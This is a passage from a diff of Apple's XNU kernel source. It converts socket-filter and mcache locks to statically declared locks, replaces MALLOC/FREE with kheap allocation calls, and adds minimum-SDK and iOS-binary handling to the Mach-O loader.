lck_mtx_unlock(sock_filter_cleanup_lock); + lck_mtx_unlock(&sock_filter_cleanup_lock); /* Take the socket filter lock */ - lck_rw_lock_exclusive(sock_filter_lock); + lck_rw_lock_exclusive(&sock_filter_lock); /* Cleanup every dead item */ struct socket_filter_entry *entry; @@ -265,7 +254,7 @@ sflt_cleanup_thread(void *blah, wait_result_t blah2) if ((entry->sfe_flags & SFEF_NODETACH) == 0 && entry->sfe_filter->sf_filter.sf_detach) { entry->sfe_flags |= SFEF_NODETACH; - lck_rw_unlock_exclusive(sock_filter_lock); + lck_rw_unlock_exclusive(&sock_filter_lock); /* * Warning - passing a potentially @@ -274,7 +263,7 @@ sflt_cleanup_thread(void *blah, wait_result_t blah2) entry->sfe_filter->sf_filter.sf_detach( entry->sfe_cookie, entry->sfe_socket); - lck_rw_lock_exclusive(sock_filter_lock); + lck_rw_lock_exclusive(&sock_filter_lock); } /* @@ -308,11 +297,11 @@ sflt_cleanup_thread(void *blah, wait_result_t blah2) sflt_release_locked(entry->sfe_filter); entry->sfe_socket = NULL; entry->sfe_filter = NULL; - FREE(entry, M_IFADDR); + kheap_free(KM_IFADDR, entry, sizeof(struct socket_filter_entry)); } /* Drop the socket filter lock */ - lck_rw_unlock_exclusive(sock_filter_lock); + lck_rw_unlock_exclusive(&sock_filter_lock); } /* NOTREACHED */ } @@ -339,8 +328,8 @@ sflt_attach_locked(struct socket *so, struct socket_filter *filter, } } /* allocate the socket filter entry */ - MALLOC(entry, struct socket_filter_entry *, sizeof(*entry), M_IFADDR, - M_WAITOK); + entry = kheap_alloc(KM_IFADDR, sizeof(struct socket_filter_entry), + Z_WAITOK); if (entry == NULL) { return ENOMEM; } @@ -369,7 +358,7 @@ sflt_attach_locked(struct socket *so, struct socket_filter *filter, * Release the filter lock -- * callers must be aware we will do this */ - lck_rw_unlock_exclusive(sock_filter_lock); + lck_rw_unlock_exclusive(&sock_filter_lock); /* Unlock the socket */ if (socklocked) { @@ -386,7 +375,7 @@ sflt_attach_locked(struct socket *so, struct socket_filter *filter, } /* Lock the filters again */ - lck_rw_lock_exclusive(sock_filter_lock); + lck_rw_lock_exclusive(&sock_filter_lock); /* * If the attach function returns an error, @@ -414,7 +403,7 @@ sflt_attach_internal(socket_t socket, sflt_handle handle) int result = EINVAL; - lck_rw_lock_exclusive(sock_filter_lock); + lck_rw_lock_exclusive(&sock_filter_lock); struct socket_filter *filter = NULL; TAILQ_FOREACH(filter, &sock_filter_head, sf_global_next) { @@ -427,7 +416,7 @@ sflt_attach_internal(socket_t socket, sflt_handle handle) result = sflt_attach_locked(socket, filter, 1); } - lck_rw_unlock_exclusive(sock_filter_lock); + lck_rw_unlock_exclusive(&sock_filter_lock); return result; } @@ -452,11 +441,11 @@ sflt_initsock(struct socket *so) */ struct protosw *proto = so->so_proto->pr_protosw; - lck_rw_lock_shared(sock_filter_lock); + lck_rw_lock_shared(&sock_filter_lock); if (TAILQ_FIRST(&proto->pr_filter_head) != NULL) { /* Promote lock to exclusive */ - if (!lck_rw_lock_shared_to_exclusive(sock_filter_lock)) { - lck_rw_lock_exclusive(sock_filter_lock); + if (!lck_rw_lock_shared_to_exclusive(&sock_filter_lock)) { + lck_rw_lock_exclusive(&sock_filter_lock); } /* @@ -495,7 +484,7 @@ sflt_initsock(struct socket *so) filter = filter_next; } } - lck_rw_done(sock_filter_lock); + lck_rw_done(&sock_filter_lock); } /* @@ -506,7 +495,7 @@ sflt_initsock(struct socket *so) __private_extern__ void sflt_termsock(struct socket *so) { - lck_rw_lock_exclusive(sock_filter_lock); + lck_rw_lock_exclusive(&sock_filter_lock); struct socket_filter_entry *entry; @@ -537,16 +526,16 @@ sflt_termsock(struct socket *so) entry->sfe_flags |= SFEF_NODETACH; /* Drop the lock before calling the detach function */ - lck_rw_unlock_exclusive(sock_filter_lock); + lck_rw_unlock_exclusive(&sock_filter_lock); sfe_filter->sf_filter.sf_detach(sfe_cookie, so); - lck_rw_lock_exclusive(sock_filter_lock); + lck_rw_lock_exclusive(&sock_filter_lock); /* Release the filter */ sflt_release_locked(sfe_filter); } } - lck_rw_unlock_exclusive(sock_filter_lock); + lck_rw_unlock_exclusive(&sock_filter_lock); } @@ -561,7 +550,7 @@ sflt_notify_internal(struct socket *so, sflt_event_t event, void *param, struct socket_filter_entry *entry; int unlocked = 0; - lck_rw_lock_shared(sock_filter_lock); + lck_rw_lock_shared(&sock_filter_lock); for (entry = so->so_filt; entry; entry = entry->sfe_next_onsocket) { if ((entry->sfe_flags & SFEF_ATTACHED) && entry->sfe_filter->sf_filter.sf_notify && @@ -572,7 +561,7 @@ sflt_notify_internal(struct socket *so, sflt_event_t event, void *param, * the socket filter lock */ sflt_entry_retain(entry); - lck_rw_unlock_shared(sock_filter_lock); + lck_rw_unlock_shared(&sock_filter_lock); /* If the socket isn't already unlocked, unlock it */ if (unlocked == 0) { @@ -588,11 +577,11 @@ sflt_notify_internal(struct socket *so, sflt_event_t event, void *param, * Take the socket filter lock again * and release the entry */ - lck_rw_lock_shared(sock_filter_lock); + lck_rw_lock_shared(&sock_filter_lock); sflt_entry_release(entry); } } - lck_rw_unlock_shared(sock_filter_lock); + lck_rw_unlock_shared(&sock_filter_lock); if (unlocked != 0) { socket_lock(so, 0); @@ -623,7 +612,7 @@ sflt_ioctl(struct socket *so, u_long cmd, caddr_t data) int unlocked = 0; int error = 0; - lck_rw_lock_shared(sock_filter_lock); + lck_rw_lock_shared(&sock_filter_lock); for (entry = so->so_filt; entry && error == 0; entry = entry->sfe_next_onsocket) { if ((entry->sfe_flags & SFEF_ATTACHED) && @@ -633,7 +622,7 @@ sflt_ioctl(struct socket *so, u_long cmd, caddr_t data) * the socket filter lock */ sflt_entry_retain(entry); - lck_rw_unlock_shared(sock_filter_lock); + lck_rw_unlock_shared(&sock_filter_lock); /* If the socket isn't already unlocked, unlock it */ if (unlocked == 0) { @@ -649,11 +638,11 @@ sflt_ioctl(struct socket *so, u_long cmd, caddr_t data) * Take the socket filter lock again * and release the entry */ - lck_rw_lock_shared(sock_filter_lock); + lck_rw_lock_shared(&sock_filter_lock); sflt_entry_release(entry); } } - lck_rw_unlock_shared(sock_filter_lock); + lck_rw_unlock_shared(&sock_filter_lock); if (unlocked) { socket_lock(so, 0); @@ -673,7 +662,7 @@ sflt_bind(struct socket *so, const struct sockaddr *nam) int unlocked = 0; int error = 0; - lck_rw_lock_shared(sock_filter_lock); + lck_rw_lock_shared(&sock_filter_lock); for (entry = so->so_filt; entry && error == 0; entry = entry->sfe_next_onsocket) { if ((entry->sfe_flags & SFEF_ATTACHED) && @@ -683,7 +672,7 @@ sflt_bind(struct socket *so, const struct sockaddr *nam) * release the socket filter lock */ sflt_entry_retain(entry); - lck_rw_unlock_shared(sock_filter_lock); + lck_rw_unlock_shared(&sock_filter_lock); /* If the socket isn't already unlocked, unlock it */ if (unlocked == 0) { @@ -699,11 +688,11 @@ sflt_bind(struct socket *so, const struct sockaddr *nam) * Take the socket filter lock again and * release the entry */ - lck_rw_lock_shared(sock_filter_lock); + lck_rw_lock_shared(&sock_filter_lock); sflt_entry_release(entry); } } - lck_rw_unlock_shared(sock_filter_lock); + lck_rw_unlock_shared(&sock_filter_lock); if (unlocked) { socket_lock(so, 0); @@ -723,7 +712,7 @@ sflt_listen(struct socket *so) int unlocked = 0; int error = 0; - lck_rw_lock_shared(sock_filter_lock); + lck_rw_lock_shared(&sock_filter_lock); for (entry = so->so_filt; entry && error == 0; entry = entry->sfe_next_onsocket) { if ((entry->sfe_flags & SFEF_ATTACHED) && @@ -733,7 +722,7 @@ sflt_listen(struct socket *so) * the socket filter lock */ sflt_entry_retain(entry); - lck_rw_unlock_shared(sock_filter_lock); + lck_rw_unlock_shared(&sock_filter_lock); /* If the socket isn't already unlocked, unlock it */ if (unlocked == 0) { @@ -749,11 +738,11 @@ sflt_listen(struct socket *so) * Take the socket filter lock again * and release the entry */ - lck_rw_lock_shared(sock_filter_lock); + lck_rw_lock_shared(&sock_filter_lock); sflt_entry_release(entry); } } - lck_rw_unlock_shared(sock_filter_lock); + lck_rw_unlock_shared(&sock_filter_lock); if (unlocked) { socket_lock(so, 0); @@ -774,7 +763,7 @@ sflt_accept(struct socket *head, struct socket *so, int unlocked = 0; int error = 0; - lck_rw_lock_shared(sock_filter_lock); + lck_rw_lock_shared(&sock_filter_lock); for (entry = so->so_filt; entry && error == 0; entry = entry->sfe_next_onsocket) { if ((entry->sfe_flags & SFEF_ATTACHED) && @@ -784,7 +773,7 @@ sflt_accept(struct socket *head, struct socket *so, * release the socket filter lock */ sflt_entry_retain(entry); - lck_rw_unlock_shared(sock_filter_lock); + lck_rw_unlock_shared(&sock_filter_lock); /* If the socket isn't already unlocked, unlock it */ if (unlocked == 0) { @@ -800,11 +789,11 @@ sflt_accept(struct socket *head, struct socket *so, * Take the socket filter lock again * and release the entry */ - lck_rw_lock_shared(sock_filter_lock); + lck_rw_lock_shared(&sock_filter_lock); sflt_entry_release(entry); } } - lck_rw_unlock_shared(sock_filter_lock); + lck_rw_unlock_shared(&sock_filter_lock); if (unlocked) { socket_lock(so, 0); @@ -824,7 +813,7 @@ sflt_getsockname(struct socket *so, struct sockaddr **local) int unlocked = 0; int error = 0; - lck_rw_lock_shared(sock_filter_lock); + lck_rw_lock_shared(&sock_filter_lock); for (entry = so->so_filt; entry && error == 0; entry = entry->sfe_next_onsocket) { if ((entry->sfe_flags & SFEF_ATTACHED) && @@ -834,7 +823,7 @@ sflt_getsockname(struct socket *so, struct sockaddr **local) * release the socket filter lock */ sflt_entry_retain(entry); - lck_rw_unlock_shared(sock_filter_lock); + lck_rw_unlock_shared(&sock_filter_lock); /* If the socket isn't already unlocked, unlock it */ if (unlocked == 0) { @@ -850,11 +839,11 @@ sflt_getsockname(struct socket *so, struct sockaddr **local) * Take the socket filter lock again * and release the entry */ - lck_rw_lock_shared(sock_filter_lock); + lck_rw_lock_shared(&sock_filter_lock); sflt_entry_release(entry); } } - lck_rw_unlock_shared(sock_filter_lock); + lck_rw_unlock_shared(&sock_filter_lock); if (unlocked) { socket_lock(so, 0); @@ -874,7 +863,7 @@ sflt_getpeername(struct socket *so, struct sockaddr **remote) int unlocked = 0; int error = 0; - lck_rw_lock_shared(sock_filter_lock); + lck_rw_lock_shared(&sock_filter_lock); for (entry = so->so_filt; entry && error == 0; entry = entry->sfe_next_onsocket) { if ((entry->sfe_flags & SFEF_ATTACHED) && @@ -884,7 +873,7 @@ sflt_getpeername(struct socket *so, struct sockaddr **remote) * the socket filter lock */ sflt_entry_retain(entry); - lck_rw_unlock_shared(sock_filter_lock); + lck_rw_unlock_shared(&sock_filter_lock); /* If the socket isn't already unlocked, unlock it */ if (unlocked == 0) { @@ -900,11 +889,11 @@ sflt_getpeername(struct socket *so, struct sockaddr **remote) * Take the socket filter lock again * and release the entry */ - lck_rw_lock_shared(sock_filter_lock); + lck_rw_lock_shared(&sock_filter_lock); sflt_entry_release(entry); } } - lck_rw_unlock_shared(sock_filter_lock); + lck_rw_unlock_shared(&sock_filter_lock); if (unlocked) { socket_lock(so, 0); @@ -924,7 +913,7 @@ sflt_connectin(struct socket *so, const struct sockaddr *remote) int unlocked = 0; int error = 0; - lck_rw_lock_shared(sock_filter_lock); + lck_rw_lock_shared(&sock_filter_lock); for (entry = so->so_filt; entry && error == 0; entry = entry->sfe_next_onsocket) { if ((entry->sfe_flags & SFEF_ATTACHED) && @@ -934,7 +923,7 @@ sflt_connectin(struct socket *so, const struct sockaddr *remote) * the socket filter lock */ sflt_entry_retain(entry); - lck_rw_unlock_shared(sock_filter_lock); + lck_rw_unlock_shared(&sock_filter_lock); /* If the socket isn't already unlocked, unlock it */ if (unlocked == 0) { @@ -950,11 +939,11 @@ sflt_connectin(struct socket *so, const struct sockaddr *remote) * Take the socket filter lock again * and release the entry */ - lck_rw_lock_shared(sock_filter_lock); + lck_rw_lock_shared(&sock_filter_lock); sflt_entry_release(entry); } } - lck_rw_unlock_shared(sock_filter_lock); + lck_rw_unlock_shared(&sock_filter_lock); if (unlocked) { socket_lock(so, 0); @@ -970,7 +959,7 @@ sflt_connectout_common(struct socket *so, const struct sockaddr *nam) int unlocked = 0; int error = 0; - lck_rw_lock_shared(sock_filter_lock); + lck_rw_lock_shared(&sock_filter_lock); for (entry = so->so_filt; entry && error == 0; entry = entry->sfe_next_onsocket) { if ((entry->sfe_flags & SFEF_ATTACHED) && @@ -980,7 +969,7 @@ sflt_connectout_common(struct socket *so, const struct sockaddr *nam) * the socket filter lock */ sflt_entry_retain(entry); - lck_rw_unlock_shared(sock_filter_lock); + lck_rw_unlock_shared(&sock_filter_lock); /* If the socket isn't already unlocked, unlock it */ if (unlocked == 0) { @@ -996,11 +985,11 @@ sflt_connectout_common(struct socket *so, const struct sockaddr *nam) * Take the socket filter lock again * and release the entry */ - lck_rw_lock_shared(sock_filter_lock); + lck_rw_lock_shared(&sock_filter_lock); sflt_entry_release(entry); } } - lck_rw_unlock_shared(sock_filter_lock); + lck_rw_unlock_shared(&sock_filter_lock); if (unlocked) { socket_lock(so, 0); @@ -1054,7 +1043,7 @@ sflt_setsockopt(struct socket *so, struct sockopt *sopt) int unlocked = 0; int error = 0; - lck_rw_lock_shared(sock_filter_lock); + lck_rw_lock_shared(&sock_filter_lock); for (entry = so->so_filt; entry && error == 0; entry = entry->sfe_next_onsocket) { if ((entry->sfe_flags & SFEF_ATTACHED) && @@ -1064,7 +1053,7 @@ sflt_setsockopt(struct socket *so, struct sockopt *sopt) * the socket filter lock */ sflt_entry_retain(entry); - lck_rw_unlock_shared(sock_filter_lock); + lck_rw_unlock_shared(&sock_filter_lock); /* If the socket isn't already unlocked, unlock it */ if (unlocked == 0) { @@ -1080,11 +1069,11 @@ sflt_setsockopt(struct socket *so, struct sockopt *sopt) * Take the socket filter lock again * and release the entry */ - lck_rw_lock_shared(sock_filter_lock); + lck_rw_lock_shared(&sock_filter_lock); sflt_entry_release(entry); } } - lck_rw_unlock_shared(sock_filter_lock); + lck_rw_unlock_shared(&sock_filter_lock); if (unlocked) { socket_lock(so, 0); @@ -1104,7 +1093,7 @@ sflt_getsockopt(struct socket *so, struct sockopt *sopt) int unlocked = 0; int error = 0; - lck_rw_lock_shared(sock_filter_lock); + lck_rw_lock_shared(&sock_filter_lock); for (entry = so->so_filt; entry && error == 0; entry = entry->sfe_next_onsocket) { if ((entry->sfe_flags & SFEF_ATTACHED) && @@ -1114,7 +1103,7 @@ sflt_getsockopt(struct socket *so, struct sockopt *sopt) * the socket filter lock */ sflt_entry_retain(entry); - lck_rw_unlock_shared(sock_filter_lock); + lck_rw_unlock_shared(&sock_filter_lock); /* If the socket isn't already unlocked, unlock it */ if (unlocked == 0) { @@ -1130,11 +1119,11 @@ sflt_getsockopt(struct socket *so, struct sockopt *sopt) * Take the socket filter lock again * and release the entry */ - lck_rw_lock_shared(sock_filter_lock); + lck_rw_lock_shared(&sock_filter_lock); sflt_entry_release(entry); } } - lck_rw_unlock_shared(sock_filter_lock); + lck_rw_unlock_shared(&sock_filter_lock); if (unlocked) { socket_lock(so, 0); @@ -1156,7 +1145,7 @@ sflt_data_out(struct socket *so, const struct sockaddr *to, mbuf_t *data, int setsendthread = 0; int error = 0; - lck_rw_lock_shared(sock_filter_lock); + lck_rw_lock_shared(&sock_filter_lock); for (entry = so->so_filt; entry && error == 0; entry = entry->sfe_next_onsocket) { /* skip if this is a subflow socket */ @@ -1170,7 +1159,7 @@ sflt_data_out(struct socket *so, const struct sockaddr *to, mbuf_t *data, * release the socket filter lock */ sflt_entry_retain(entry); - lck_rw_unlock_shared(sock_filter_lock); + lck_rw_unlock_shared(&sock_filter_lock); /* If the socket isn't already unlocked, unlock it */ if (unlocked == 0) { @@ -1191,11 +1180,11 @@ sflt_data_out(struct socket *so, const struct sockaddr *to, mbuf_t *data, * Take the socket filter lock again * and release the entry */ - lck_rw_lock_shared(sock_filter_lock); + lck_rw_lock_shared(&sock_filter_lock); sflt_entry_release(entry); } } - lck_rw_unlock_shared(sock_filter_lock); + lck_rw_unlock_shared(&sock_filter_lock); if (unlocked) { socket_lock(so, 0); @@ -1219,7 +1208,7 @@ sflt_data_in(struct socket *so, const struct sockaddr *from, mbuf_t *data, int error = 0; int unlocked = 0; - lck_rw_lock_shared(sock_filter_lock); + lck_rw_lock_shared(&sock_filter_lock); for (entry = so->so_filt; entry && (error == 0); entry = entry->sfe_next_onsocket) { @@ -1234,7 +1223,7 @@ sflt_data_in(struct socket *so, const struct sockaddr *from, mbuf_t *data, * release the socket filter lock */ sflt_entry_retain(entry); - lck_rw_unlock_shared(sock_filter_lock); + lck_rw_unlock_shared(&sock_filter_lock); /* If the socket isn't already unlocked, unlock it */ if (unlocked == 0) { @@ -1250,11 +1239,11 @@ sflt_data_in(struct socket *so, const struct sockaddr *from, mbuf_t *data, * Take the socket filter lock again * and release the entry */ - lck_rw_lock_shared(sock_filter_lock); + lck_rw_lock_shared(&sock_filter_lock); sflt_entry_release(entry); } } - lck_rw_unlock_shared(sock_filter_lock); + lck_rw_unlock_shared(&sock_filter_lock); if (unlocked) { socket_lock(so, 0); @@ -1284,7 +1273,7 @@ sflt_detach(socket_t socket, sflt_handle handle) return EINVAL; } - lck_rw_lock_exclusive(sock_filter_lock); + lck_rw_lock_exclusive(&sock_filter_lock); for (entry = socket->so_filt; entry; entry = entry->sfe_next_onsocket) { if (entry->sfe_filter->sf_filter.sf_handle == handle && (entry->sfe_flags & SFEF_ATTACHED) != 0) { @@ -1295,7 +1284,7 @@ sflt_detach(socket_t socket, sflt_handle handle) if (entry != NULL) { sflt_detach_locked(entry); } - lck_rw_unlock_exclusive(sock_filter_lock); + lck_rw_unlock_exclusive(&sock_filter_lock); return result; } @@ -1333,14 +1322,12 @@ sflt_register_common(const struct sflt_filter *filter, int domain, int type, } /* Allocate the socket filter */ - MALLOC(sock_filt, struct socket_filter *, sizeof(*sock_filt), - M_IFADDR, M_WAITOK); + sock_filt = kheap_alloc(KM_IFADDR, + sizeof(struct socket_filter), Z_WAITOK | Z_ZERO); if (sock_filt == NULL) { return ENOBUFS; } - bzero(sock_filt, sizeof(*sock_filt)); - /* Legacy sflt_filter length; current structure minus extended */ len = sizeof(*filter) - sizeof(struct sflt_filter_ext); /* @@ -1359,7 +1346,7 @@ sflt_register_common(const struct sflt_filter *filter, int domain, int type, } bcopy(filter, &sock_filt->sf_filter, len); - lck_rw_lock_exclusive(sock_filter_lock); + lck_rw_lock_exclusive(&sock_filter_lock); /* Look for an existing entry */ TAILQ_FOREACH(match, &sock_filter_head, sf_global_next) { if (match->sf_filter.sf_handle == @@ -1384,10 +1371,10 @@ sflt_register_common(const struct sflt_filter *filter, int domain, int type, INC_ATOMIC_INT64_LIM(net_api_stats.nas_sfltr_register_os_total); } } - lck_rw_unlock_exclusive(sock_filter_lock); + lck_rw_unlock_exclusive(&sock_filter_lock); if (match != NULL) { - FREE(sock_filt, M_IFADDR); + kheap_free(KM_IFADDR, sock_filt, sizeof(struct socket_filter)); return EEXIST; } @@ -1415,8 +1402,7 @@ sflt_register_common(const struct sflt_filter *filter, int domain, int type, !SOCK_CHECK_TYPE(so, type)) { continue; } - MALLOC(solist, struct solist *, sizeof(*solist), - M_IFADDR, M_NOWAIT); + solist = kheap_alloc(KHEAP_TEMP, sizeof(struct solist), Z_NOWAIT); if (!solist) { continue; } @@ -1434,8 +1420,7 @@ sflt_register_common(const struct sflt_filter *filter, int domain, int type, !SOCK_CHECK_TYPE(so, type)) { continue; } - MALLOC(solist, struct solist *, sizeof(*solist), - M_IFADDR, M_NOWAIT); + solist = kheap_alloc(KHEAP_TEMP, sizeof(struct solist), Z_NOWAIT); if (!solist) { continue; } @@ -1480,7 +1465,7 @@ sflt_register_common(const struct sflt_filter *filter, int domain, int type, sock_release(so); solist = solisthead; solisthead = solisthead->next; - FREE(solist, M_IFADDR); + kheap_free(KHEAP_TEMP, solist, sizeof(struct solist)); } return error; @@ -1504,7 +1489,7 @@ errno_t sflt_unregister(sflt_handle handle) { struct socket_filter *filter; - lck_rw_lock_exclusive(sock_filter_lock); + lck_rw_lock_exclusive(&sock_filter_lock); /* Find the entry by the handle */ TAILQ_FOREACH(filter, &sock_filter_head, sf_global_next) { @@ -1537,7 +1522,7 @@ sflt_unregister(sflt_handle handle) sflt_release_locked(filter); } - lck_rw_unlock_exclusive(sock_filter_lock); + lck_rw_unlock_exclusive(&sock_filter_lock); if (filter == NULL) { return ENOENT; diff --git a/bsd/kern/mach_loader.c b/bsd/kern/mach_loader.c index d01293ca7..28b5c4fd1 100644 --- a/bsd/kern/mach_loader.c +++ b/bsd/kern/mach_loader.c @@ -1373,6 +1373,15 @@ parse_machfile( } vmc = (struct version_min_command *) lcp; ret = load_version(vmc, &found_version_cmd, imgp->ip_flags, result); +#if XNU_TARGET_OS_OSX + if (ret == LOAD_SUCCESS) { + if (result->ip_platform == PLATFORM_IOS) { + vm_map_mark_alien(map); + } else { + assert(!vm_map_is_alien(map)); + } + } +#endif /* XNU_TARGET_OS_OSX */ break; } case LC_BUILD_VERSION: { @@ -1390,7 +1399,15 @@ parse_machfile( } result->ip_platform = bvc->platform; result->lr_sdk = bvc->sdk; + result->lr_min_sdk = bvc->minos; found_version_cmd = TRUE; +#if XNU_TARGET_OS_OSX + if (result->ip_platform == PLATFORM_IOS) { + vm_map_mark_alien(map); + } else { + assert(!vm_map_is_alien(map)); + } +#endif /* XNU_TARGET_OS_OSX */ break; } default: @@ -2502,6 +2519,7 @@ load_version( { uint32_t platform = 0; uint32_t sdk; + uint32_t min_sdk; if (vmc->cmdsize < sizeof(*vmc)) { return LOAD_BADMACHO; @@ -2511,6 +2529,7 @@ load_version( } *found_version_cmd = TRUE; sdk = vmc->sdk; + min_sdk = vmc->version; switch (vmc->cmd) { case LC_VERSION_MIN_MACOSX: platform = PLATFORM_MACOS; @@ -2547,10 +2566,12 @@ load_version( /* All LC_VERSION_MIN_* load commands are legacy and we will not be adding any more */ default: sdk = (uint32_t)-1; + min_sdk = (uint32_t)-1; __builtin_unreachable(); } result->ip_platform = platform; - result->lr_min_sdk = sdk; + result->lr_min_sdk = min_sdk; + result->lr_sdk = sdk; return LOAD_SUCCESS; } @@ -3005,7 +3026,7 @@ load_dylinker( /* Allocate wad-of-data from heap to reduce excessively deep stacks */ - MALLOC(dyld_data, void *, sizeof(*dyld_data), M_TEMP, M_WAITOK); + dyld_data = kheap_alloc(KHEAP_TEMP, sizeof(*dyld_data), Z_WAITOK); header = &dyld_data->__header; myresult = &dyld_data->__myresult; macho_data = &dyld_data->__macho_data; @@ -3061,7 +3082,7 @@ load_dylinker( vnode_put(vp); kheap_free(KHEAP_TEMP, va, sizeof(*va)); novp_out: - FREE(dyld_data, M_TEMP); + kheap_free(KHEAP_TEMP, dyld_data, sizeof(*dyld_data)); return ret; } diff --git a/bsd/kern/mcache.c b/bsd/kern/mcache.c index 76b4c601e..693a14437 100644 --- a/bsd/kern/mcache.c +++ b/bsd/kern/mcache.c @@ -86,13 +86,13 @@ * caches when memory runs low. */ #define MCACHE_LIST_LOCK() { \ - lck_mtx_lock(mcache_llock); \ + lck_mtx_lock(&mcache_llock); \ mcache_llock_owner = current_thread(); \ } #define MCACHE_LIST_UNLOCK() { \ mcache_llock_owner = NULL; \ - lck_mtx_unlock(mcache_llock); \ + lck_mtx_unlock(&mcache_llock); \ } #define MCACHE_LOCK(l) lck_mtx_lock(l) @@ -101,11 +101,9 @@ static unsigned int ncpu; static unsigned int cache_line_size; -static lck_mtx_t *mcache_llock; static struct thread *mcache_llock_owner; -static lck_attr_t *mcache_llock_attr; -static lck_grp_t *mcache_llock_grp; -static lck_grp_attr_t *mcache_llock_grp_attr; +static LCK_GRP_DECLARE(mcache_llock_grp, "mcache.list"); +static LCK_MTX_DECLARE(mcache_llock, &mcache_llock_grp); static struct zone *mcache_zone; static const uint32_t mcache_reap_interval = 15; static const uint32_t mcache_reap_interval_leeway = 2; @@ -122,9 +120,6 @@ static unsigned int mcache_flags = 0; int mca_trn_max = MCA_TRN_MAX; -#define DUMP_MCA_BUF_SIZE 512 -static char *mca_dump_buf; - static mcache_bkttype_t mcache_bkttype[] = { { 1, 4096, 32768, NULL }, { 3, 2048, 16384, NULL }, @@ -140,7 +135,7 @@ static mcache_bkttype_t mcache_bkttype[] = { static mcache_t *mcache_create_common(const char *, size_t, size_t, mcache_allocfn_t, mcache_freefn_t, mcache_auditfn_t, mcache_logfn_t, - mcache_notifyfn_t, void *, u_int32_t, int, int); + mcache_notifyfn_t, void *, u_int32_t, int); static unsigned int mcache_slab_alloc(void *, mcache_obj_t ***, unsigned int, int); static void mcache_slab_free(void *, mcache_obj_t *, boolean_t); @@ -189,12 +184,6 @@ mcache_init(void) ncpu = ml_wait_max_cpus(); (void) mcache_cache_line_size(); /* prime it */ - mcache_llock_grp_attr = lck_grp_attr_alloc_init(); - mcache_llock_grp = lck_grp_alloc_init("mcache.list", - mcache_llock_grp_attr); - mcache_llock_attr = lck_attr_alloc_init(); - mcache_llock = lck_mtx_alloc_init(mcache_llock_grp, mcache_llock_attr); - mcache_reap_tcall = thread_call_allocate(mcache_reap_timeout, NULL); mcache_update_tcall = thread_call_allocate(mcache_update, NULL); if (mcache_reap_tcall == NULL || mcache_update_tcall == NULL) { @@ -258,11 +247,10 @@ mcache_cache_line_size(void) */ __private_extern__ mcache_t * mcache_create(const char *name, size_t bufsize, size_t align, - u_int32_t flags, int wait) + u_int32_t flags, int wait __unused) { return mcache_create_common(name, bufsize, align, mcache_slab_alloc, - mcache_slab_free, mcache_slab_audit, NULL, NULL, NULL, flags, 1, - wait); + mcache_slab_free, mcache_slab_audit, NULL, NULL, NULL, flags, 1); } /* @@ -274,10 +262,10 @@ __private_extern__ mcache_t * mcache_create_ext(const char *name, size_t bufsize, mcache_allocfn_t allocfn, mcache_freefn_t freefn, mcache_auditfn_t auditfn, mcache_logfn_t logfn, mcache_notifyfn_t notifyfn, void *arg, - u_int32_t flags, int wait) + u_int32_t flags, int wait __unused) { return mcache_create_common(name, bufsize, 0, allocfn, - freefn, auditfn, logfn, notifyfn, arg, flags, 0, wait); + freefn, auditfn, logfn, notifyfn, arg, flags, 0); } /* @@ -287,7 +275,7 @@ static mcache_t * mcache_create_common(const char *name, size_t bufsize, size_t align, mcache_allocfn_t allocfn, mcache_freefn_t freefn, mcache_auditfn_t auditfn, mcache_logfn_t logfn, mcache_notifyfn_t notifyfn, void *arg, - u_int32_t flags, int need_zone, int wait) + u_int32_t flags, int need_zone) { mcache_bkttype_t *btp; mcache_t *cp = NULL; @@ -296,23 +284,11 @@ mcache_create_common(const char *name, size_t bufsize, size_t align, unsigned int c; char lck_name[64]; - /* If auditing is on and print buffer is NULL, allocate it now */ - if ((flags & MCF_DEBUG) && mca_dump_buf == NULL) { - int malloc_wait = (wait & MCR_NOSLEEP) ? M_NOWAIT : M_WAITOK; - MALLOC(mca_dump_buf, char *, DUMP_MCA_BUF_SIZE, M_TEMP, - malloc_wait | M_ZERO); - if (mca_dump_buf == NULL) { - return NULL; - } - } - - buf = zalloc(mcache_zone); + buf = zalloc_flags(mcache_zone, Z_WAITOK | Z_ZERO); if (buf == NULL) { goto fail; } - bzero(buf, MCACHE_ALLOC_SIZE); - /* * In case we didn't get a cache-aligned memory, round it up * accordingly. This is needed in order to get the rest of @@ -358,10 +334,7 @@ mcache_create_common(const char *name, size_t bufsize, size_t align, (void) snprintf(cp->mc_name, sizeof(cp->mc_name), "mcache.%s", name); (void) snprintf(lck_name, sizeof(lck_name), "%s.cpu", cp->mc_name); - cp->mc_cpu_lock_grp_attr = lck_grp_attr_alloc_init(); - cp->mc_cpu_lock_grp = lck_grp_alloc_init(lck_name, - cp->mc_cpu_lock_grp_attr); - cp->mc_cpu_lock_attr = lck_attr_alloc_init(); + cp->mc_cpu_lock_grp = lck_grp_alloc_init(lck_name, LCK_GRP_ATTR_NULL); /* * Allocation chunk size is the object's size plus any extra size @@ -383,20 +356,14 @@ mcache_create_common(const char *name, size_t bufsize, size_t align, * Initialize the bucket layer. */ (void) snprintf(lck_name, sizeof(lck_name), "%s.bkt", cp->mc_name); - cp->mc_bkt_lock_grp_attr = lck_grp_attr_alloc_init(); cp->mc_bkt_lock_grp = lck_grp_alloc_init(lck_name, - cp->mc_bkt_lock_grp_attr); - cp->mc_bkt_lock_attr = lck_attr_alloc_init(); - lck_mtx_init(&cp->mc_bkt_lock, cp->mc_bkt_lock_grp, - cp->mc_bkt_lock_attr); + LCK_GRP_ATTR_NULL); + lck_mtx_init(&cp->mc_bkt_lock, cp->mc_bkt_lock_grp, LCK_ATTR_NULL); (void) snprintf(lck_name, sizeof(lck_name), "%s.sync", cp->mc_name); - cp->mc_sync_lock_grp_attr = lck_grp_attr_alloc_init(); cp->mc_sync_lock_grp = lck_grp_alloc_init(lck_name, - cp->mc_sync_lock_grp_attr); - cp->mc_sync_lock_attr = lck_attr_alloc_init(); - lck_mtx_init(&cp->mc_sync_lock, cp->mc_sync_lock_grp, - cp->mc_sync_lock_attr); + LCK_GRP_ATTR_NULL); + lck_mtx_init(&cp->mc_sync_lock, cp->mc_sync_lock_grp, LCK_ATTR_NULL); for (btp = mcache_bkttype; chunksize <= btp->bt_minbuf; btp++) { continue; @@ -412,8 +379,7 @@ mcache_create_common(const char *name, size_t bufsize, size_t align, mcache_cpu_t *ccp = &cp->mc_cpu[c]; VERIFY(IS_P2ALIGNED(ccp, CPU_CACHE_LINE_SIZE)); - lck_mtx_init(&ccp->cc_lock, cp->mc_cpu_lock_grp, - cp->mc_cpu_lock_attr); + lck_mtx_init(&ccp->cc_lock, cp->mc_cpu_lock_grp, LCK_ATTR_NULL); ccp->cc_objs = 